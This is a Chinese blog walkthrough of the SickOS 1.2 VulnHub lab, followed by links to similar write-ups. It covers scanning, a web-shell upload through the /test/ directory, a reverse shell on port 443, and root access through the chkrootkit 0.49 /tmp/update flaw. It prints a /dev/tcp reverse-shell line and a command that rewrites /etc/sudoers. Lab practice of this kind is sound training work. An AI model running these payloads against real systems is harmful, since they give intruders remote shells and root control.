vulnhub靶场-sickos1.2

最新推荐文章于 2024-03-21 22:23:42 发布
最新推荐文章于 2024-03-21 22:23:42 发布
阅读量279 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzzzkeai/article/details/128243777
版权

vulnhub靶场–靶场

信息收集

主机发现

ipconfig查看kali IP
在这里插入图片描述

端口扫描

nmap 192.168.17.0/24
在这里插入图片描述

目录扫描

dirsearch -u http://192.168.17.136:80
在这里插入图片描述
dirb http://192.168.17.136
在这里插入图片描述
可以访问的目录有

http://192.168.17.136/test/
http://192.168.17.136/index.php

渗透攻击

在http://192.168.17.136/test/目录页面抓包发现可以使用POST方式
在这里插入图片描述
上传一句话木马试试
在这里插入图片描述
在这里插入图片描述
蚁剑连接
在这里插入图片描述
上传一个大马
在这里插入图片描述
在这里插入图片描述
然后监听9955端口然后nc监听访问nc -vnlp 9955
在这里插入图片描述
WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
防火墙过滤规则本地端口只允许22和80,外来端口只允许8080和443,用来保证对外部https服务的正常访问,这里需要将端口改为443端口就可以直接接到shell啦。
在这里插入图片描述

后渗透攻击

接到反弹shell后第一件事是获取一个完整交互终端

python -c "import pty;pty.spawn('/bin/bash');"

上面的代码只是获取一个可交互的一个终端但是它不可以使用上下键去翻看之前的执行的代码。
在这里插入图片描述
我之前也一直是使用的上面的那个交互终端,也慢慢的习惯啦但是这个终端是一个完整的交互终端及其好用呀
在这里插入图片描述
sudo -l 查看一下sudo执行文件
在这里插入图片描述
还不知道密码
那就查看一下suid执行文件
find / -perm -u=s -type f 2>/dev/null
没有什么特别的
查看计划任务
find / -name cron* 2>/dev/null
在这里插入图片描述
查看下每日任务,发现运行着一个rootkit后门检测工具
在这里插入图片描述
查看版本
在这里插入图片描述
searchsploit chkrootkit 0.49
在这里插入图片描述
查看存在漏洞
在这里插入图片描述
意思就是/tmp/update下的文件会以root权限定期执行
这里就有两个骚方法啦一个是写bashshell弹到我们监听的端口上或者就是将www-date添加到sudo组
echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL) NOPASSWD:ALL” > /etc/sudoers’ > /tmp/update
在这里插入图片描述
在这里插入图片描述
另一种方法
根据exp的描述是目标靶机的Chkrootkit会周期性以root身份执行目录/tmp/update的文件,所以创建一个shell脚本

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.17.128/8080 0>&1\n' > /tmp/update

然后监听8080端口
就是root权限啦

嘿嘿也不太行!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 405
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
SICKOS: 1.2
MD@@nr丫卡uer
12-18 370
#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口,从web入手。 #3寻找入口 查看源代码,没东⻄。 扫描一下目录 访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的,没有发现能利用的 使用nikto扫描一下,看到一些信息 nikto -host 192.168.1.124 nmap看一下http中开启的methods方法,有个pu
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3819
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
【甄选靶场Vulnhub百个项目渗透——项目十三:SickOs 1.2(防火墙绕过,计划任务写入)
人间体佐菲的博客
09-15 760
web安全,网络安全,渗透测试,信息安全,网络空间安全
SICKOS 1.2 WALKTHROUGH
weixin_41082546的博客
08-11 380
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 首先获取目标ip地址,并探测端口 netdiscover -i eth0 -r 192.168.88.1/24 访问web,并查看源码,没有什么有用的东西 目录发现 dirbhttp://192.168.88.201 nikto -hhtt...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
Vulnhub靶机 SickOs1.2
菜浪马废的博客
04-25 230
没啥有用的东西 只有一个test 可以用put方式 试了好几个端口4444 1180 1234都不行 换了443可以了 成功提权 就用了一种方法 这有个大佬,写的超级详细 传送门 ...
vulhub-SickOs: 1.2
战神/calmness的博客
05-24 219
目录 信息收集 文件包含 提权-计划任务-chkrootkit版本0.49漏洞 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http lighttpd 1.4.28 MAC Address: 00:0C:29:BA:70:AF (VMware) Service Inf..
vulnhub SickOs: 1.2
箭雨镜屋
01-14 2707
渗透思路: nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 300
Vulnhub—靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
Vulnhub靶机:SickOs1.2
最新发布
qq_48904485的博客
03-21 747
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 1001
记一次Vulnhub-SickOs1.2渗透过程
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2200
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
靶机实战-SickOs1.2
滕财然的博客
01-27 373
SickOs1.2靶机实战 文章目录SickOs1.2靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务Getshell方式一Getshell方式二5、提权方式一方式二方法三//这一个方法我没成功,你们可以尝试一下 1、主机发现 arp扫描 目标IP:192.168.232.161 2、端口扫描 目标开放80、22端口 3、端口详细信息扫描 4、访问80端口...
靶机渗透实战——SickOs1.2
wlw876747595的博客
12-17 882
一、实验环境 靶机:SickOs1.2,IP地址暂时未知 测试机:Kali(IP:192.168.232.130) 测试机:物理机win7 二、实验流程 信息收集——主机发现 信息收集——端口扫描 渗透测试 三、实验步骤 (一)信息收集——主机发现 1、查看kaliIP信息 2、查看靶机页面 3、扫描主机(netdiscover) netdiscover -i e...
vulhub靶场学习日记SickOs1.2
m0_55763479的博客
07-14 857
vulhub靶场学习日记SickOs1.2
vulnhubSickOs1.2 靶机
Nicky_Zheng的博客
01-29 532
1、 信息收集 1.1、主机发现 使用netdiscover扫描靶机ip kali@kali:~$ sudo netdiscover -i eth1 6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值